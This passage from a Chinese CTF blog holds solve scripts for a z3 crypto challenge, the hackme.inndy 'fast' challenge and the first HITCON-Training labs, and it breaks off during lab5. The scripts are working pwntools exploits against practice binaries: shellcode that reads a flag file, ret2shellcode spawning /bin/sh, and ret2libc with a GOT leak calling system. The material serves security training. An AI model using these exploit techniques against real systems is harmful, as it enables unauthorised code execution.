class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">UGT</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULT</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">257</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">x</span> <span class="o">==</span> <span class="p">(</span><span class="n">a</span> <span class="o">+</span> <span class="n">b</span> <span class="o">*</span> <span class="mi">3</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">y</span> <span class="o">==</span> <span class="p">(</span><span class="n">b</span> <span class="o">-</span> <span class="n">c</span> <span class="o">*</span> <span class="mi">5</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">z</span> <span class="o">==</span> <span class="p">(</span><span class="n">a</span> <span class="o">+</span> <span class="n">c</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="k">while</span> <span class="n">s</span><span class="o">.</span><span class="n">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span> <span class="k">if</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">())</span> <span class="ow">and</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">b</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">())</span> <span class="ow">and</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">c</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">()):</span> <span class="k">print</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()</span> <span class="n">A</span><span class="p">,</span> <span class="n">B</span><span class="p">,</span> <span class="n">C</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">(),</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">b</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">(),</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">c</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">Or</span><span class="p">(</span><span class="n">a</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a</span><span class="p">],</span> <span class="n">b</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">b</span><span class="p">],</span> <span class="n">c</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">c</span><span class="p">]))</span> <span class="k">else</span><span class="p">:</span> <span class="k">print</span> <span class="s2">&#34;Finished&#34;</span> <span class="k">return</span> <span class="n">A</span><span class="p">,</span> <span class="n">B</span><span class="p">,</span> <span class="n">C</span> <span class="k">def</span> <span class="nf">getFlag</span><span class="p">((</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">)):</span> <span class="n">M</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;M&#34;</span><span class="p">]</span> <span class="n">p</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;p&#34;</span><span class="p">]</span> <span class="n">q</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;q&#34;</span><span class="p">]</span> <span class="n">s1</span><span class="p">,</span> <span class="n">s2</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">xgcd</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span> <span class="k">if</span> <span class="n">s1</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">:</span> <span class="n">s1</span> <span class="o">=</span> <span class="o">-</span><span class="n">s1</span> <span class="n">p</span> <span class="o">=</span> <span class="n">invmod</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">M</span><span class="p">)</span> <span class="k">elif</span> <span class="n">s2</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">:</span> <span class="n">s2</span> <span class="o">=</span> <span class="o">-</span><span class="n">s2</span> <span class="n">q</span> <span class="o">=</span> <span class="n">invmod</span><span class="p">(</span><span class="n">q</span><span class="p">,</span> <span class="n">M</span><span class="p">)</span> <span class="n">flag</span> <span class="o">=</span> <span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s1</span><span class="p">,</span> <span class="n">M</span><span class="p">)</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">q</span><span class="p">,</span> <span class="n">s2</span><span class="p">,</span> <span class="n">M</span><span class="p">))</span> <span class="o">%</span> <span class="n">M</span> <span class="k">print</span> <span class="n">n2s</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="c1"># getabc()</span> <span class="n">getFlag</span><span class="p">(</span><span class="n">getabc</span><span class="p">())</span> </code></pre></td></tr></table> </div> </div><p>整个脚本也才8s左右</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fntrmcv0rtj30t705378b.jpg" alt=""></p> <blockquote> <p>OwO多了一步求flag的过程，计算时间反而更短了，看来计算时间还是跟CPU的心情有关系</p> </blockquote> <h2 id="programming">Programming</h2> <h3 id="fast">fast</h3> <p>ppc类型的题目，注意数据范围在int32范围内即可，同时注意如果使用pwntools写socket的话，没有必要recvuntil后再send，完全可以现将所有的输入输出都存到缓冲区中，最后一次性send，具体看脚本</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">inndy_fast</span> <span class="p">[</span><span class="n">master</span><span class="p">]</span> <span class="n">cat</span> <span class="n">exp</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">numpy</span> <span class="kn">import</span> <span class="n">int32</span> <span class="kn">import</span> <span class="nn">time</span> <span class="kn">import</span> <span class="nn">re</span> <span class="c1"># context.log_level = &#39;debug&#39;</span> <span class="c1"># io = process(&#34;./fast&#34;)</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;hackme.inndy.tw&#34;</span><span class="p">,</span> <span class="mi">7707</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;the game.</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;Yes I know&#34;</span><span class="p">)</span> <span class="n">ans</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="n">res</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="n">f</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">int32</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">x</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">10000</span><span class="p">):</span> <span class="n">n1</span><span class="p">,</span> <span class="n">op</span><span class="p">,</span> <span class="n">n2</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;=&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">)</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39; &#39;</span><span class="p">)</span> <span class="c1"># print n1, op, n2</span> <span class="n">io</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span> <span class="k">if</span> <span class="n">op</span> <span class="o">==</span> <span class="s1">&#39;+&#39;</span><span class="p">:</span> <span class="c1"># print n1, op, n2</span> <span class="n">ans</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">f</span><span class="p">(</span><span class="n">n1</span><span class="p">)</span> <span class="o">+</span> <span class="n">f</span><span class="p">(</span><span class="n">n2</span><span class="p">))</span> <span class="k">if</span> <span class="n">op</span> <span class="o">==</span> <span class="s1">&#39;-&#39;</span><span class="p">:</span> <span class="n">ans</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">f</span><span class="p">(</span><span class="n">n1</span><span class="p">)</span> <span class="o">-</span> <span class="n">f</span><span class="p">(</span><span class="n">n2</span><span class="p">))</span> <span class="k">if</span> <span class="n">op</span> <span class="o">==</span> <span class="s1">&#39;*&#39;</span><span class="p">:</span> <span class="n">ans</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">f</span><span class="p">(</span><span class="n">n1</span><span class="p">)</span> <span class="o">*</span> <span class="n">f</span><span class="p">(</span><span class="n">n2</span><span class="p">))</span> <span class="k">if</span> <span class="n">op</span> <span class="o">==</span> <span class="s1">&#39;/&#39;</span><span class="p">:</span> <span class="n">ans</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">n1</span><span class="p">)</span> <span class="o">/</span> <span class="nb">int</span><span class="p">(</span><span class="n">n2</span><span class="p">)))</span> <span class="n">res</span> <span class="o">+=</span> <span class="p">(</span><span class="n">ans</span> <span class="o">+</span> <span class="s2">&#34; &#34;</span><span class="p">)</span> <span class="c1"># print res</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div> https://bash-c.github.io/post/hitcon-training-writeup/ Mon, 02 Jul 2018 12:05:10 +0800 https://bash-c.github.io/post/hitcon-training-writeup/ <h1 id="hitcon-training-writeup">HITCON-Training-Writeup</h1> <blockquote> <p>项目地址<a href="https://github.com/bash-c/HITCON-Training-Writeup">M4x&rsquo;s github</a>，欢迎 star~</p> </blockquote> <p>复习一下二进制基础，写写 HITCON-Training 的 writeup，题目地址：https://github.com/scwuaptx/HITCON-Training</p> <h2 id="outline">Outline</h2> <ul> <li>Basic Knowledge <ul> <li>Introduction <ul> <li>Reverse Engineering <ul> <li>Static Analysis</li> <li>Dynamic Analysis</li> </ul> </li> <li>Exploitation</li> <li>Useful Tool <ul> <li>IDA PRO</li> <li>GDB</li> <li>Pwntool</li> </ul> </li> <li>lab 1 - sysmagic</li> </ul> </li> <li>Section</li> <li>Compile,linking,assmbler</li> <li>Execution <ul> <li>how program get run</li> <li>Segment</li> </ul> </li> <li>x86 assembly <ul> <li>Calling convention</li> <li>lab 2 - open/read/write</li> <li>shellcoding</li> </ul> </li> </ul> </li> <li>Stack Overflow <ul> <li>Buffer Overflow</li> <li>Return to Text/Shellcode <ul> <li>lab 3 - ret2shellcode</li> </ul> </li> <li>Protection <ul> <li>ASLR/DEP/PIE/StackGuard</li> </ul> </li> <li>Lazy binding</li> <li>Return to Library <ul> <li>lab 4 - ret2lib</li> </ul> </li> </ul> </li> <li>Return Oriented Programming <ul> <li>ROP <ul> <li>lab 5 - simple rop</li> </ul> </li> <li>Using ROP bypass ASLR <ul> <li>ret2plt</li> </ul> </li> <li>Stack migration <ul> <li>lab 6 - migration</li> </ul> </li> </ul> </li> <li>Format String Attack <ul> <li>Format String</li> <li>Read from arbitrary memory <ul> <li>lab 7 - crack</li> </ul> </li> <li>Write to arbitrary memory <ul> <li>lab 8 - craxme</li> </ul> </li> <li>Advanced Trick <ul> <li>EBP chain</li> <li>lab 9 - playfmt</li> </ul> </li> </ul> </li> <li>x64 Binary Exploitation <ul> <li>x64 assembly</li> <li>ROP</li> <li>Format string Attack</li> </ul> </li> <li>Heap exploitation <ul> <li>Glibc memory allocator overview</li> <li>Vulnerablility on heap <ul> <li>Use after free <ul> <li>lab 10 - hacknote</li> </ul> </li> <li>Heap overflow <ul> <li>house of force <ul> <li>lab 11 - 1 - bamboobox1</li> </ul> </li> <li>unlink <ul> <li>lab 11 - 2 - bamboobox2</li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> <li>Advanced heap exploitation <ul> <li>Fastbin attack <ul> <li>lab 12 - babysecretgarden</li> </ul> </li> <li>Shrink the chunk</li> <li>Extend the chunk <ul> <li>lab 13 - heapcreator</li> </ul> </li> <li>Unsortbin attack <ul> <li>lab 14 - magicheap</li> </ul> </li> </ul> </li> <li>C++ Exploitation <ul> <li>Name Mangling</li> <li>Vtable fucntion table</li> <li>Vector &amp; String</li> <li>New &amp; delete</li> <li>Copy constructor &amp; assignment operator <ul> <li>lab 15 - zoo</li> </ul> </li> </ul> </li> </ul> <h2 id="writeup">Writeup</h2> <h3 id="lab1-sysmagic">lab1-sysmagic</h3> <p>一个很简单的逆向题，看 get_flag 函数的逻辑逆回来即可，直接逆向的方法就不说了</p> <p>或者经过观察，flag 的生成与输入无关，因此可以通过 patch 或者调试直接获得 flag</p> <h4 id="patch">patch</h4> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fpcpmdngq8j30ja047dg7.jpg" alt=""></p> <p>修改关键判断即可，patch 后保存运行，输入任意值即可得 flag</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fpcpmkyf79j30ez03emxy.jpg" alt=""></p> <h4 id="调试">调试</h4> <p>通过观察汇编，我们只需使下图的 cmp 满足即可，可以通过 gdb 调试，在调试过程中手动满足该条件</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fpcpngmh9cj30f904gdfx.jpg" alt=""></p> <p>直接写出 gdb 脚本</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-shell" data-lang="shell">lab1 <span class="o">[</span>master●●<span class="o">]</span> cat solve b *get_flag+389 r <span class="c1">#your input</span> <span class="nb">set</span> <span class="nv">$eax</span><span class="o">=</span><span class="nv">$edx</span> c lab1 <span class="o">[</span>master●●<span class="o">]</span> </code></pre></td></tr></table> </div> </div><p>也可得到 flag</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fpcpmxbneij30qu0c5dll.jpg" alt=""></p> <p>同时注意，IDA 对字符串的识别出了问题，修复方法可以参考 inndy 的 <a href="http://www.cnblogs.com/WangAoBo/p/7706719.html"><strong>ROP2</strong></a></p> <h3 id="lab2-orwbin">lab2-orw.bin</h3> <p>通过查看 prctl 的 man 手册发现该程序限制了一部分系统调用，根据题目的名字 open, read, write以及IDA分析，很明显是要我们自己写读取并打印 flag 的 shellcode 了，偷个懒，直接调用 shellcraft 模块</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab2</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="n">shellcraft</span> <span class="k">as</span> <span class="n">sc</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">shellcode</span> <span class="o">=</span> <span class="n">sc</span><span class="o">.</span><span class="n">pushstr</span><span class="p">(</span><span class="s2">&#34;/home/m4x/HITCON-Training/LAB/lab2/testFlag&#34;</span><span class="p">)</span> <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">sc</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s2">&#34;esp&#34;</span><span class="p">)</span> <span class="c1"># open返回的文件文件描述符存贮在eax寄存器里 </span> <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">sc</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="s2">&#34;eax&#34;</span><span class="p">,</span> <span class="s2">&#34;esp&#34;</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">)</span> <span class="c1"># open读取的内容放在栈顶 </span> <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">sc</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&#34;esp&#34;</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">)</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./orw.bin&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;shellcode:&#34;</span><span class="p">,</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span> <span class="k">print</span> <span class="n">io</span><span class="o">.</span><span class="n">recvall</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> <span class="n">lab2</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> </code></pre></td></tr></table> </div> </div><p>该题与 pwnable.tw 的 orw 类似，那道题的 writeup 很多，因此就不说直接撸汇编的方法了</p> <h3 id="lab3-ret2sc">lab3-ret2sc</h3> <p>很简单的 ret2shellcode，程序没有开启 NX 和 canary 保护，把 shellcode 存贮在 name 这个全局变量上，并 ret 到该地址即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab3</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="p">(</span><span class="n">os</span> <span class="o">=</span> <span class="s2">&#34;linux&#34;</span><span class="p">,</span> <span class="n">arch</span> <span class="o">=</span> <span class="s2">&#34;i386&#34;</span><span class="p">)</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./ret2sc&#34;</span><span class="p">)</span> <span class="n">shellcode</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">execve</span><span class="p">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mi">32</span><span class="p">),</span> <span class="mh">0x804a060</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> <span class="n">lab3</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> </code></pre></td></tr></table> </div> </div><p>需要注意的是，该程序中的 read 是通过 esp 寻址的，因此具体的 offset 可以通过调试查看</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fpcpljuki5j30g702wdfy.jpg" alt=""></p> <p>也可以通过 peda 的 pattern_offset/pattern_search , pwntools 的 cyclic/cyclic -l 等工具来找 offset</p> <h3 id="lab4-ret2lib">lab4-ret2lib</h3> <p>ret2libc，并且程序中已经有了一个可以查看 got 表中值的函数 See_something，直接 leak 出 libc 基址，通过 one_gadget 或者 system(&quot;/bin/sh&rdquo;) 都可以 get shell，/bin/sh 可以使用 libc 中的字符串，可以通过 read 读入到内存中，也可以使用 binary 中的字符串</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab4</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./ret2lib&#34;</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./ret2lib&#34;</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;/lib/i386-linux-gnu/libc.so.6&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s2">&#34;puts&#34;</span><span class="p">]))</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">)</span> <span class="n">libcBase</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s2">&#34;puts&#34;</span><span class="p">]</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;libcBase -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libcBase</span><span class="p">))</span> <span class="c1"># oneGadget = libcBase + 0x3a9fc</span> <span class="c1"># payload = flat(cyclic(60), oneGadget)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mi">60</span><span class="p">),</span> <span class="n">libcBase</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s2">&#34;system&#34;</span><span class="p">],</span> <span class="mh">0xdeadbeef</span><span class="p">,</span> <span class="nb">next</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s2">&#34;sh</span><span class="se">\x00</span><span class="s2">&#34;</span><span class="p">)))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> <span class="n">lab4</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> </code></pre></td></tr></table> </div> </div><h3 id="lab5-simplerop">lab5-simplerop</h3> <p>本来看程序是静态链接的，想通过 ROPgadget/ropper 等工具生成的 ropchain 一波带走，但实际操作时发现 read 函数只允许读入 100 个字符，去除 buf 到 main 函数返回地址的偏移为 32，我们一共有 100 - 32 = 68 的长度来构造 ropchain，而 ropper/ROPgadget 等自动生成的 ropchain 都大于这个长度，这就需要我们精心设计 ropchain 了，这里偷个懒，优化一下 ropper 生成的 ropchain 来缩短长度</p> <blockquote> <p>ropper &ndash;file ./simplerop &ndash;chain &ldquo;execve cmd=/bin/sh&rdquo;</p> <p>ROPgadget &ndash;binary ./simplerop &ndash;ropchain</p> </blockquote> <p>先看一下 ropper 生成的 ropchain</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span 